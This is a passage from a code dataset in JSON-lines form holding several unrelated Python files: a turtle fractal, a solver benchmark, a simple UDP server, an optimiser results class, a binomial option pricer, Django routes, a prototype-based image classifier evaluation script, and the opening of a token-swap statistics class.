变位词组.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32433153836","text":"import turtle\n\npen = turtle.Turtle()\npen.speed(5)\n\ndef ct(order, size):\n \"\"\"\n Make turtle draw a Cesaro torn line fractal of 'order' and 'size'.\n \"\"\"\n if order == 0: # The base case is just a straight line\n pen.forward(size)\n else:\n for angle in [-85, 170, -85, 0]:\n ct(order - 1, size / 3)\n pen.left(angle)\n\nct(3, 200)","repo_name":"flaco99/Statistics-Course","sub_path":"cs12/recursive/Cesaro_torn_line_fractal.py","file_name":"Cesaro_torn_line_fractal.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70531581285","text":"#!/usr/bin/env python2\n# bench.py\n# (c) Daniel Bershatsky, 2016\n# See LISENCE for details.\n\nfrom __future__ import print_function\nfrom argparse import ArgumentParser\nfrom sys import path\n\npath.append('..')\n\nfrom nls.model import Problem\nfrom nls.pumping import GaussianPumping2D\n\nfrom numpy import polyfit, polyval, linspace\nfrom scipy.io import savemat, loadmat\nfrom seaborn import color_palette\nfrom matplotlib.pyplot import figure, show\n\n\ndef create_model(num_nodes=200, num_iters=2000, order=5):\n return Problem().model(\n model = '2d',\n dx = 2.0e-1,\n dt = 2.0e-3,\n t0 = 0.0,\n u0 = 0.1,\n order = order,\n num_nodes = num_nodes,\n num_iters = num_iters,\n pumping = GaussianPumping2D(power=15.0, variation=3.14),\n original_params = {\n 'R': 0.0242057488654,\n 'gamma': 0.0242057488654,\n 'g': 0.00162178517398,\n 'tilde_g': 0.0169440242057,\n 'gamma_R': 0.242057488654\n })\n\ndef bench_num_nodes():\n nodes = [50, 100, 200, 300, 400, 500, 700, 1000]\n times = []\n\n for i, num_nodes in enumerate(nodes):\n model = create_model(num_nodes=num_nodes)\n solution = model.solve()\n solution.report()\n times.append(solution.getElapsedTime())\n\n savemat('nodes.mat', {'nodes': nodes, 'times': times})\n\ndef bench_num_iters():\n iters = range(500, 5001, 500)\n times = []\n\n for i, num_iters in enumerate(iters):\n model = create_model(num_iters=num_iters)\n solution = model.solve()\n solution.report()\n times.append(solution.getElapsedTime())\n\n savemat('iters.mat', {'iters': iters, 'times': times})\n\ndef bench_orders():\n orders = [3, 5, 7]\n nodes = [200, 400]\n times = [[], []]\n\n for i, num_nodes in enumerate(nodes):\n for j, order in enumerate(orders):\n model = create_model(num_nodes=num_nodes, order=order)\n solution = model.solve()\n solution.report()\n times[i].append(solution.getElapsedTime())\n\n savemat('orders.mat', {'orders': orders, 'nodes': nodes, 'times': times})\n\ndef visualize(filenames=('nodes.mat', 'iters.mat', 'orders.mat')):\n nodes_mat = loadmat(filenames[0])\n iters_mat = loadmat(filenames[1])\n orders_mat = loadmat(filenames[2])\n\n palette = color_palette('muted')\n\n # curve fitting\n nodes = linspace(min(nodes_mat['nodes'][0]), max(nodes_mat['nodes'][0]), 50)\n nodes_poly = polyfit(list(nodes_mat['nodes'][0]) + [0.0], list(nodes_mat['times'][0]) + [0.0], 2)\n\n iters = linspace(min(iters_mat['iters'][0]), max(iters_mat['iters'][0]), 50)\n iters_poly = polyfit(iters_mat['iters'][0], iters_mat['times'][0], 1)\n\n # plotting\n\n fig = figure(figsize=(17, 6))\n\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(nodes_mat['nodes'][0], nodes_mat['times'][0], 'o-', label='exp')\n ax.plot(nodes, polyval(nodes_poly, nodes), label='fit')\n ax.set_ylim(0.0)\n ax.set_xlabel('nodes')\n ax.set_ylabel('time, s')\n ax.legend(loc='best')\n\n ax = fig.add_subplot(1, 3, 2)\n ax.plot(iters_mat['iters'][0], iters_mat['times'][0], 'o-', label='exp')\n ax.plot(iters, polyval(iters_poly, iters), label='fit')\n ax.set_xlabel('iterations')\n ax.set_ylabel('time, s')\n ax.legend(loc='best')\n\n ax = fig.add_subplot(1, 3, 3)\n ax.bar(orders_mat['orders'][0] + 0.2, orders_mat['times'][0], color=palette[0], label='200x200')\n ax.bar(orders_mat['orders'][0] + 1.0, orders_mat['times'][1], color=palette[1], label='400x400')\n ax.set_xlabel('approximation order')\n ax.set_ylabel('time, s')\n ax.set_xticks((4, 6, 8))\n ax.set_xticklabels((3, 5, 7))\n ax.legend(loc='best')\n \n fig.savefig('benchmark.png')\n show()\n\ndef main():\n parser = ArgumentParser(prog='benchmark.py', description='Test perfomance.')\n parser.add_argument('--only-bench', action='store_true')\n parser.add_argument('--only-show', action='store_true')\n\n args = parser.parse_args()\n\n if args.only_bench and args.only_show:\n parser.print_help()\n parser.exit()\n\n if args.only_bench:\n bench_num_nodes()\n bench_num_iters()\n bench_orders()\n\n if args.only_show:\n visualize()\n\n\nif __name__ == '__main__':\n main()","repo_name":"daskol/nls","sub_path":"benchmark/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"72911627366","text":"#UDP Server side\nimport socket\nenv=''\nip_address = \"\"\n\n#Create a server side socket IPv4 (AF_INET) and UDP (SOCK_DGRAM)\nserver_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n\n# Bind the socket to a specific tuple (IP address and port)\nif env == \"PRODUCTION\":\n ip_address = socket.gethostbyname(socket.gethostname())\n\nserver_socket.bind((ip_address, 12345))\n\n#We are not listening or accepting connections since UDP is a connectionless protocol\n\nmessage, address = server_socket.recvfrom(10)\nprint(message.decode(\"utf-8\"))\nprint(address)\n\nmessage, address = server_socket.recvfrom(10)\nprint(message.decode(\"utf-8\"))\nprint(address)","repo_name":"KMaster90/python_socket_examples","sub_path":"01_socket_intro/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22001487167","text":"import os\nimport numpy as np\nfrom optimisers import columns\nfrom optimisers.abstract_result import AbstractResult\nfrom optimisers.timer import Timer\n\n# Initialise default column types added to a Result object\nDEFAULT_COLUMN_TYPES = [\n columns.Iteration,\n columns.Time,\n columns.TrainError,\n columns.TestError\n]\n\nclass Result(AbstractResult):\n \"\"\"\n Class to store the results of optimisation in a single object which can be\n passed directly to plotting and/or analysis functions. Also contains\n methods for updating and displaying results.\n\n NOTE: saving and loading of Result objects is currently deprecated, because\n due to updating this module with Column objects, implementing saving and\n loading of Result objects in npz files would currently require more effort\n to develop than is worthwhile. Alternative are to manually extract\n value_lists from each column and save those in a npz file, or just pickle\n the whole Result object. TODO: implement saving and loading of Result\n objects\n \"\"\"\n def __init__(\n self,\n name=None,\n verbose=True,\n file=None,\n add_default_columns=True\n ):\n \"\"\" Store the name of the experiment (which is useful later when\n displaying results), verbosity, output file, and initialise list of\n columns, and dictionary mapping types of columns to their instances. If\n specified by the input argument, then add default columns to this Result\n object. \"\"\"\n self.name = name if (name is not None) else \"Unnamed experiment\"\n self.file = file\n self.verbose = verbose\n self._column_list = list()\n self._column_dict = dict()\n self._iteration = 0\n self.begun = False\n if add_default_columns:\n self._add_default_columns()\n self._init_timer()\n\n def _add_default_columns(self):\n for col in DEFAULT_COLUMN_TYPES:\n self.add_column(col())\n\n def add_column(self, column):\n if type(column) in self._column_dict:\n raise ValueError(\"A column with this name has already been added\")\n\n self._column_list.append(column)\n self._column_dict[type(column)] = column\n\n def replace_column(self, column):\n \"\"\" Replace a column belonging to this result object with a different\n column (provided as an argument) of the same type. If no column of the\n same type belongs to this object already, then a new one is simply\n added \"\"\"\n # Delete the column from this result object, if it exists already\n if type(column) in self._column_dict:\n existing_column = self._column_dict[type(column)]\n self._column_list.remove(existing_column)\n\n # Add the new column\n self._column_list.append(column)\n self._column_dict[type(column)] = column\n\n\n def get_iteration_number(self):\n \"\"\" Return the current iteration number, as an integer \"\"\"\n return self._iteration\n\n def get_values(self, column_type):\n \"\"\" Given the type of column, return the list of values for the column\n with the matching type.\n\n Raises KeyError if this Result object does not have a Column with a\n matching type. \"\"\"\n return self._column_dict[column_type].value_list\n\n def get_final_train_reconstruction_error(self):\n \"\"\" Return the final mean reconstruction error of the model on the\n training set \"\"\"\n return self._column_dict[columns.TrainError].value_list[-1]\n\n def get_column_name(self, column_type):\n \"\"\" Given the type of column, return the name of the column with the\n matching type.\n\n Raises KeyError if this Result object does not have a Column with a\n matching type. \"\"\"\n return self._column_dict[column_type].name\n\n def begin(self):\n \"\"\" Display column headers for the columns in this result (if this\n result object is verbose, and these column headers have not already\n been displayed by calling this method previously), and if this result\n does not have a timer object, then add a timer object, and tell it to\n begin.\n\n If a specific timer object is to be added to this Result class, which\n can be done using the set_timer method (inherited from the TimedObject\n class via the AbstractResult class), then the set_timer method should\n be called before this method (Result.begin), in order to avoid\n unnecessarily initialising an extra timer object \"\"\"\n if self.verbose:\n self.display_headers()\n\n if not self.has_timer():\n timer = Timer()\n self.set_timer(timer)\n timer.begin()\n\n self.begun = True\n\n def update(self, **kwargs):\n \"\"\" Update all the columns in this Result object with new values.\n Depending on the columns used by this object, certain keyword arguments\n will be required; if the default columns are used, then the keyword\n arguments model, dataset, and iteration will be required. The begin\n method must be called before the update method, otherwise an\n AttributeError is raised. \"\"\"\n kwargs[\"time\"] = self.time_elapsed()\n self._iteration = kwargs.get(\"iteration\")\n\n for col in self._column_list:\n col.update(kwargs)\n\n if self.verbose:\n self._display_last()\n\n def display_headers(self):\n title_list = [col.title_str for col in self._column_list]\n print(\"\\nPerforming test \\\"{}\\\"...\".format(self.name), file=self.file)\n print(\" | \".join(title_list), file=self.file)\n print(\" | \".join(\"-\" * len(t) for t in title_list), file=self.file)\n\n def _display_last(self):\n \"\"\"\n Display the results of the last time the update method was called.\n Raises IndexError if update has not been called on this object before\n \"\"\"\n print(\n \" | \".join(col.get_value_str() for col in self._column_list),\n file=self.file\n )\n\n def display_summary(self, n_iters):\n t_total = self.time_elapsed()\n t_mean = t_total / n_iters\n print(\n \"-\" * 50,\n \"{:30} = {}\".format(\"Test name\", self.name),\n \"{:30} = {:,.4f} s\".format(\"Total time\", t_total),\n \"{:30} = {:,}\".format(\"Total iterations\", n_iters),\n \"{:30} = {:.4f} ms\".format(\n \"Average time per iteration\",\n 1e3 * t_mean\n ),\n \"{:30} = {:,.1f}\".format(\n \"Average iterations per second\",\n 1 / t_mean\n ),\n sep=\"\\n\",\n end=\"\\n\\n\",\n file=self.file\n )\n\n def __repr__(self):\n return \"Result({})\".format(repr(self.name))\n","repo_name":"jakelevi1996/backprop2","sub_path":"optimisers/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5043377464","text":"\"\"\"\r\nPython code to implement a multi-step binomial tree to price the\r\noption in both American and European cases\r\nAuthor: Azam Jainullabudin Mohamed\r\n\"\"\"\r\nimport numpy as np\r\nimport math\r\n\r\n# Input from the question\r\nr=0.04; # risk\r\nvolatility=0.2; # Volatility\r\ntime=2; # time\r\n#n=5; # input trees\r\n\r\n\r\n# Function for evaluating the binomial option pricing\r\n# for both European and American options\r\ndef binomial_tree(n, option):\r\n # Change in time based upon the value \r\n dtime=time/n;\r\n # Up value\r\n u=np.exp(volatility*math.sqrt(dtime))\r\n # Down value\r\n d=1/u\r\n \r\n # probability value\r\n p=(np.exp(r*dtime)-d)/(u-d);\r\n \r\n # Initial stock value\r\n S0=[[42]]\r\n \r\n # To calculate the nodes values for n binomial tree\r\n for j in range(1,n+1):\r\n temp=[]\r\n for i in range(1,j+2):\r\n s=S0[0][0]*(u**(i-1))*(d**(j-(i-1)))\r\n temp.insert(j,s);\r\n S0.insert(i,temp)\r\n print(\"**********************************************\")\r\n print(\"Current stock price in %d binomial option tree\" % n)\r\n print(\"**********************************************\")\r\n print(S0)\r\n print(\" \")\r\n \r\n # Initializing new matrix to store the payoff values in american option\r\n new_mat=np.zeros([n+1,n+1])\r\n # Initialing matrix for comparing the values of payoff and f(ni)\r\n # to manipulate the early exercise optimal node\r\n early=np.zeros([n+1,n+1])\r\n # Matrix to store the f(ni) values at each node\r\n options=np.zeros([n+1,n+1])\r\n # Matrix containing the updated values of nodes in n binomial tree\r\n f_value=np.zeros([n+1, n+1])\r\n \r\n # Excercising the european and American option\r\n flag = 0\r\n for i in range(n,-1,-1):\r\n for j in range(0, i+1):\r\n # Exercising \"European\" option pricing\r\n if(option == \"European\" or option == \"european\" or option == \"E\" or option == \"e\"):\r\n if(i == n):\r\n payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n options[i,j] = payoff\r\n # Condition to calculate the payoff at the last column\r\n elif( i != n): \r\n options[i,j] = np.exp(-r * dtime)* ((1-p) * options[i+1, j] + p* options[i+1, j+1])\r\n \r\n # Exercising \"American\" option pricing\r\n if(option == \"American\" or option == \"american\" or option == \"A\" or option == \"a\"):\r\n if(flag == 1):\r\n american_payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n new_mat[i,j] = american_payoff\r\n if(i == n):\r\n payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n options[i,j] = payoff\r\n # Condition to calculate the payoff at the last column\r\n elif(i != n):\r\n payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n f_value[i,j] = np.exp(-r * dtime)* ((1-p) * options[i+1, j] + p* options[i+1, j+1])\r\n options[i,j] = max(payoff, f_value[i,j])\r\n \r\n # Validating the optimal node for early exercise option\r\n if(new_mat[i,j] >= options[i,j] and new_mat[i,j] != 0 and options[i,j] != 0):\r\n early[i,j] = new_mat[i,j]\r\n elif(new_mat[i, j] != options[i,j]):\r\n early[i,j] = 0\r\n flag=1\r\n \r\n print(\"\")\r\n # Printing the F(ni) values by exercising European option pricing\r\n if(option == \"European\" or option == \"european\" or option == \"E\" or option == \"e\"):\r\n print(\"********************************************\")\r\n print(\"European option pricing for %d step binomial\" % n)\r\n print(\"********************************************\")\r\n print(options)\r\n \r\n # Printing the F(ni) values by exercising American option pricing\r\n elif(option == \"American\" or option == \"american\" or option == \"A\" or option == \"a\"):\r\n print(\"***************************************************\")\r\n print(\"American option pricing for %d step binomial\" % n)\r\n print(\"**************************************************\")\r\n print(options)\r\n #print(\"YES\")\r\n #print(f_value)\r\n\r\n print(\"\")\r\n print(\"**************************************************\")\r\n print(\"American option payoff values for %d step binomial\" % n)\r\n print(\"**************************************************\")\r\n print(new_mat)\r\n print(\"\")\r\n \r\n print(\"**** Comparing the payoff matrix with option matrix for \", end=\"\")\r\n print(\"calculating the optimal option for early excercise ****\")\r\n print(\"\")\r\n print(\"***********************************************\")\r\n print(\"Nodes at which early exercise can be beneficial\")\r\n print(\"***********************************************\")\r\n # To print the Optimal early exercise option\r\n for i in range(n,-1,-1):\r\n for j in range(0, i+1):\r\n if(early[i,j] != 0):\r\n print(\"Early exercise value is optimal at node value\", end=\" \")\r\n print(i, end= \" \")\r\n print(j, end=\" \")\r\n print(\"is\", end= \" \")\r\n print(early[i,j])\r\n\r\n# Start of the program\r\n# Function call to binomial tree\r\n# Exercising the binomial tree with European option\r\nprint(\"Enter the step of binomial tree\")\r\nn = int(input())\r\nprint(\"```````` EUROPEAN OPTION ````````\")\r\nbinomial_tree(n, \"European\")\r\nprint(\"\")\r\n# Exercising the binomial tree with American option\r\nprint(\"```````` AMERICAN OPTION ````````\")\r\nbinomial_tree(n, \"American\")","repo_name":"AzamJM/Option-pricing-using-Python","sub_path":"Option_pricing.py","file_name":"Option_pricing.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43764671057","text":"from django.urls import path, re_path\r\nfrom wordload import views\r\n\r\n\r\nurlpatterns = [\r\n re_path('^deploy/$',views.deploy,name='deploy'),\r\n re_path('^deploy_api/$',views.deploy_api,name='deploy_api'),\r\n re_path('^ds/$', views.ds, name='ds'),\r\n re_path('^ds_api/$', views.ds_api, name='ds_api'),\r\n re_path('^sts/$', views.sts, name='sts'),\r\n re_path('^sts_api/$', views.sts_api, name='sts_api'),\r\n re_path('^pods/$', views.pods, name='pods'),\r\n re_path('^pods_api/$', views.pods_api, name='pods_api'),\r\n\r\n]\r\n","repo_name":"MinKo-e/k8s-dashboard","sub_path":"wordload/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9927023955","text":"import os, sys\nimport argparse\nimport logging\nimport pprint\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport cyanure as cyan\nimport torchvision.transforms as transforms\n\nimport src.deit as deit\nimport src.resnet50 as resnet_models\nfrom clip.model import VisionTransformer, ModifiedResNet\n\nfrom src.utils import load_pretrained\nfrom src.data_manager import init_data as init_inet_data\nfrom src.wilds_loader import init_data as init_wilds_data\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n '--mask', type=float,\n default=0.0,\n help='regularization')\nparser.add_argument(\n '--preload', action='store_true',\n help='whether to preload embs if possible')\nparser.add_argument(\n '--fname', type=str,\n help='model architecture')\nparser.add_argument(\n '--model-name', type=str,\n help='model architecture')\nparser.add_argument(\n '--pretrained', type=str,\n help='path to pretrained model',\n default='')\nparser.add_argument(\n '--device', type=str,\n default='cuda:0',\n help='device to run script on')\nparser.add_argument(\n '--normalize', type=bool,\n default=True,\n help='whether to standardize images before feeding to nework')\nparser.add_argument(\n '--root-path-train', type=str,\n default='../datasets/',\n help='root directory to training data')\nparser.add_argument(\n '--image-folder-train', type=str,\n default='ImageNet/',\n help='image directory inside root_path_train')\nparser.add_argument(\n '--root-path-test', type=str,\n default='../datasets/',\n help='root directory to test data')\nparser.add_argument(\n '--image-folder-test', type=str,\n default='ImageNet/',\n help='image directory inside root_path_test')\nparser.add_argument(\n '--subset-path', type=str,\n default=None,\n help='name of dataset to train on')\nparser.add_argument(\n '--val-split', type=str,\n default=None,\n help='name of split to evaluate on') \nparser.add_argument(\n '--log-file', type=str,\n default=None,\n help='path of file to which write logs to')\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n_GLOBAL_SEED, NUM_CLASSES, REMAP_DICT = 0, 0, {}\nnp.random.seed(_GLOBAL_SEED)\ntorch.manual_seed(_GLOBAL_SEED)\ntorch.backends.cudnn.benchmark = True\n\npp = pprint.PrettyPrinter(indent=4)\n\n\ndef main(\n blocks,\n mask_frac,\n preload,\n pretrained,\n fname,\n subset_path,\n root_path_train,\n image_folder_train,\n root_path_test,\n image_folder_test,\n val_split=None,\n model_name=None,\n normalize=True,\n device_str='cuda:0'\n):\n device = torch.device(device_str)\n if 'cuda' in device_str:\n torch.cuda.set_device(device)\n\n # -- Define file names used to save computed embeddings (for efficient\n # -- reuse if running the script more than once)\n subset_tag = '-'.join(subset_path.split('/')).split('.txt')[0] if subset_path is not None \\\n else 'imagenet_subsets1-100percent'\n train_embs_path = os.path.join(pretrained, f'train-features-{subset_tag}-{fname}')\n # -- Save embeddings for each test dataset separately\n dataset_tag = '-'.join(image_folder_test.split('/'))[:-1]\n test_embs_path = os.path.join(pretrained, f'val-features-{dataset_tag}-{fname}')\n logger.info(train_embs_path)\n logger.info(test_embs_path)\n\n pretrained = os.path.join(pretrained, fname)\n\n # -- Function to make train/test dataloader\n def init_pipe(training):\n # -- make data transforms\n transform = transforms.Compose([\n transforms.Resize(size=256),\n transforms.CenterCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize(\n (0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))])\n # -- init data-loaders/samplers\n subset_file = subset_path if training else None\n root_path = root_path_train if training else root_path_test\n image_folder = image_folder_train if training else image_folder_test\n init_data = init_wilds_data if 'wilds' in root_path else init_inet_data \n data_loader, _ = init_data(\n transform=transform,\n batch_size=16,\n num_workers=0,\n world_size=1,\n rank=0,\n root_path=root_path,\n image_folder=image_folder,\n training=training,\n drop_last=False,\n subset_file=subset_file,\n val_split=val_split)\n return data_loader\n\n # -- Initialize the model\n encoder = init_model(\n device=device,\n pretrained=pretrained,\n model_name=model_name)\n encoder.eval()\n\n # -- If train embeddings already computed, load file, otherwise, compute\n # -- embeddings and save\n if preload and os.path.exists(train_embs_path):\n checkpoint = torch.load(train_embs_path, map_location='cpu')\n embs, labs = checkpoint['embs'], checkpoint['labs']\n logger.info(f'loaded embs of shape {embs.shape}')\n else:\n data_loader = init_pipe(True)\n embs, labs = make_embeddings(\n blocks=blocks,\n device=device,\n mask_frac=mask_frac,\n data_loader=data_loader,\n encoder=encoder)\n torch.save({\n 'embs': embs,\n 'labs': labs\n }, train_embs_path)\n logger.info(f'saved train embs of shape {embs.shape}')\n # -- Normalize embeddings\n cyan.preprocess(embs, normalize=normalize, columns=False, centering=True)\n\n # -- Get cluster embeddings and labels\n clr_embs, clr_labs = make_cluster_embs(embs, labs)\n # -- Evaluate and log\n train_top1, train_avg = calc_accs(embs, labs, clr_embs, clr_labs, None)\n # -- (save train top-1 and per-class avg. accs)\n logger.info(f'train top1: {train_top1}')\n logger.info(f'train avg: {train_avg}')\n\n # -- If test embeddings already computed, load file, otherwise, compute\n # -- embeddings and save\n if preload and os.path.exists(test_embs_path):\n checkpoint = torch.load(test_embs_path, map_location='cpu')\n test_embs, test_labs = checkpoint['embs'], checkpoint['labs']\n logger.info(f'loaded test embs of shape {test_embs.shape}')\n else:\n data_loader = init_pipe(False)\n test_embs, test_labs = make_embeddings(\n blocks=blocks,\n device=device,\n mask_frac=0.0,\n data_loader=data_loader,\n encoder=encoder)\n torch.save({\n 'embs': test_embs,\n 'labs': test_labs\n }, test_embs_path)\n logger.info(f'saved test embs of shape {test_embs.shape}')\n # -- Normalize embeddings\n cyan.preprocess(test_embs, normalize=normalize, columns=False, centering=True)\n\n # -- Evaluate and log\n try:\n val_projection_fn = getattr(data_loader, 'project_logits', None)\n except Exception:\n val_projection_fn = None\n test_top1, test_avg = calc_accs(test_embs, test_labs, clr_embs, clr_labs, val_projection_fn)\n # -- (save test top-1 and per-class avg. acc)\n logger.info(f'test top1: {test_top1}')\n logger.info(f'test avg: {test_avg}\\n\\n')\n\n return test_top1, test_avg\n\n\ndef make_embeddings(\n blocks,\n device,\n mask_frac,\n data_loader,\n encoder,\n epochs=1\n):\n ipe = len(data_loader)\n\n z_mem, l_mem = [], []\n\n for _ in range(epochs):\n for itr, data in enumerate(data_loader):\n imgs, labels = data[0].to(device), data[1].to(device)\n with torch.no_grad():\n z = encoder(imgs).cpu()\n labels = labels.cpu().tolist()\n z_mem.append(z)\n l_mem.extend(labels)\n if itr % 50 == 0:\n logger.info(f'[{itr}/{ipe}]')\n\n z_mem = torch.cat(z_mem, 0)\n # NOTE: potentailly remap labels because cyanure can't handle empty classes\n global NUM_CLASSES, REMAP_DICT\n if not len(REMAP_DICT):\n uniq_classes = sorted(list(set(l_mem)))\n REMAP_DICT = {uniq_classes[i]:i for i in range(len(uniq_classes))}\n NUM_CLASSES = len(REMAP_DICT)\n logger.info(f'No. of classes: {NUM_CLASSES}')\n l_mem = [REMAP_DICT[l_mem[i]] for i in range(len(l_mem))]\n l_mem = torch.tensor(l_mem)\n logger.info(z_mem.shape)\n logger.info(l_mem.shape)\n return z_mem, l_mem\n\n\n# -- Average embeddings for cluster prototypes\ndef make_cluster_embs(\n embs,\n labs,\n num_classes=1000\n):\n n, embs_dim = embs.shape\n clr_embs = torch.zeros(num_classes, embs_dim)\n lab_cnts = torch.zeros(num_classes)\n for i in range(n):\n lab = labs[i]\n lab_cnts[lab] += 1\n clr_embs[lab] += embs[i] \n # -- Remove fully zero prototypes\n clr_labs = torch.unique(torch.nonzero(clr_embs, as_tuple=True)[0])\n lab_cnts = lab_cnts[clr_labs]\n clr_embs = clr_embs[clr_labs]/lab_cnts.unsqueeze(-1)\n \n logger.info(clr_embs.shape)\n logger.info(clr_labs.shape)\n\n return clr_embs, clr_labs\n\n\n# -- Calculate top-1 and per-class avf acc based on L2-distance from prototypes\ndef calc_accs(embs, labs, clr_embs, clr_labs, val_projection_fn=None):\n global NUM_CLASSES\n l2_dist = torch.cdist(embs, clr_embs, p=2.0)\n _, min_idx = torch.min(l2_dist, dim=-1)\n pred_labs = clr_labs[min_idx]\n\n if val_projection_fn:\n onehot = torch.zeros(pred_labs.shape[0], NUM_CLASSES)\n onehot[np.arange(pred_labs.shape[0]), pred_labs] = 1\n onehot = val_projection_fn(onehot, 'cpu')\n NUM_CLASSES = onehot.shape[1]\n pred_labs = onehot.argmax(axis=1)\n\n correct = torch.sum(torch.eq(pred_labs, labs))\n top1_acc = 100. * correct / labs.shape[0]\n\n conf_mat = torch.zeros(NUM_CLASSES, NUM_CLASSES)\n for l, p in zip(labs, pred_labs): conf_mat[l, p] += 1\n tot_per_cls, corr_per_cls = conf_mat.sum(axis=1), conf_mat.diagonal()\n per_cls_acc = corr_per_cls[tot_per_cls != 0] / tot_per_cls[tot_per_cls != 0]\n avg_acc = 100. * per_cls_acc.mean()\n\n return top1_acc, avg_acc\n\n\ndef init_model(\n device,\n pretrained,\n model_name,\n):\n if 'deit' in model_name:\n encoder = deit.__dict__[model_name]()\n encoder.fc = None\n encoder.norm = None\n elif 'resnet' in model_name:\n encoder = resnet_models.__dict__[model_name](output_dim=0, eval_mode=False)\n elif 'clip' in model_name:\n if 'vitb16' in model_name:\n encoder = VisionTransformer(input_resolution=224, patch_size=16, \\\n width=768, layers=12, heads=12, output_dim=512)\n elif 'rn50' in model_name:\n encoder = ModifiedResNet(input_resolution=224, layers=(3, 4, 6, 3), \\\n heads=32, width=64, output_dim=1024)\n else:\n raise Exception(f\"Model {model_name} is not supported.\")\n exit(0)\n\n encoder.to(device)\n encoder, _ = load_pretrained(r_path=pretrained, encoder=encoder, model_name=model_name)\n\n return encoder\n\n\nif __name__ == '__main__':\n \"\"\"'main' for launching script using params read from command line\"\"\"\n global args\n args = parser.parse_args()\n pp.pprint(args)\n # TODO -- write full length logs\n if args.log_file is not None:\n os.makedirs(os.path.dirname(args.log_file), exist_ok=True)\n logger.addHandler(logging.FileHandler(args.log_file, mode='w'))\n main(\n blocks=1,\n mask_frac=args.mask,\n preload=args.preload,\n pretrained=args.pretrained,\n fname=args.fname,\n subset_path=args.subset_path,\n root_path_train=args.root_path_train,\n image_folder_train=args.image_folder_train,\n root_path_test=args.root_path_test,\n image_folder_test=args.image_folder_test,\n val_split=args.val_split, \n model_name=args.model_name,\n normalize=args.normalize,\n device_str=args.device\n )","repo_name":"Aaditya-Singh/Low-Shot-Robustness","sub_path":"protonet_eval.py","file_name":"protonet_eval.py","file_ext":"py","file_size_in_byte":11857,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"33959282295","text":"#coding=utf-8\n\nimport json\nimport time\nimport datetime\nimport pymysql\nfrom sqlalchemy import func\nfrom libs.xwc_api import XWC\nfrom libs.xt_api import Api\nfrom libs import session\nfrom libs.models import StSwapTick, BlTxEvents, BlBlock, StSwapStat\nfrom libs.models import StSwapLiquidity\n\n\nclass TokenSwapStat:\n def __init__(self, xwc_api, xt_api):\n self._xwc_api = xwc_api\n self._xt_api = xt_api\n self.pairs = {\n 'xwc_eth': 'XWCCJV5jJ8acWx3AfVPUT6x1K2hXRkptZ8hGB',\n 'xwc_cusd': 'XWCCarrfVrHCRupUbJfasasx2Rdy4Aor8eTD9',\n 'xwc_tp': 'XWCCcUF3uQDHzyhAuKsZ9DtFyVBcFuousjR6w'\n }\n self.pairsReverse = {\n 'XWCCJV5jJ8acWx3AfVPUT6x1K2hXRkptZ8hGB': 'xwc_eth',\n 'XWCCarrfVrHCRupUbJfasasx2Rdy4Aor8eTD9': 'xwc_cusd',\n 'XWCCcUF3uQDHzyhAuKsZ9DtFyVBcFuousjR6w': 'xwc_tp'\n }\n self.id2AssetName = {'1.3.0': 'XWC', '1.3.3': 'ETH'}\n self.last1HourBlock = 0\n self.last24HourBlock = 0\n self.firstTpBlock = 5003249\n self.perBlockTp = 0.06944444\n\n def addr2Token(self, address):\n addrTokenMap = {\n 'XWCCUXT5Dr5EdYtoHBkCsTqSUUEpNd5uf22Db': 'TP',\n 'XWCCc55NYwUDeQyy2Co5hqdFt75wWUrMu71rW': 'CUSD',\n 'XWC': 'XWC',\n 'ETH': 'ETH'\n }\n return addrTokenMap[address]\n\n def token2Addr(self, token):\n tokenAddrMap = {\n 'TP': 'XWCCUXT5Dr5EdYtoHBkCsTqSUUEpNd5uf22Db',\n 'CUSD': 'XWCCc55NYwUDeQyy2Co5hqdFt75wWUrMu71rW',\n 'XWC': 'XWC',\n 'ETH': 'ETH'\n }\n return tokenAddrMap[token]\n\n def _getMatchedBlock(self, startBlock, endBlock, startTime):\n blockNumber = startBlock\n while blockNumber < endBlock:\n block = self._xwc_api.get_block(blockNumber)\n blockTime = int(time.mktime(time.strptime(block['timestamp'], \"%Y-%m-%dT%H:%M:%S\")))\n if startTime < blockTime:\n return blockNumber - 1\n blockNumber += 1\n return 0\n\n def _getBatch2Reward(self, startBlock, endBlock, totalReward):\n perWeekBlock = 7 * 24 * 600\n weekBlocks = [[5360500+perWeekBlock*i, totalReward/16*(2-i)*5/perWeekBlock] for i in range(3)]\n weekBlocks[2][1] = totalReward/16/perWeekBlock\n reward = 0\n\n for b in weekBlocks:\n if startBlock > b[0]+perWeekBlock or endBlock < b[0]:\n continue\n if startBlock >= b[0]:\n segStart = startBlock\n else:\n 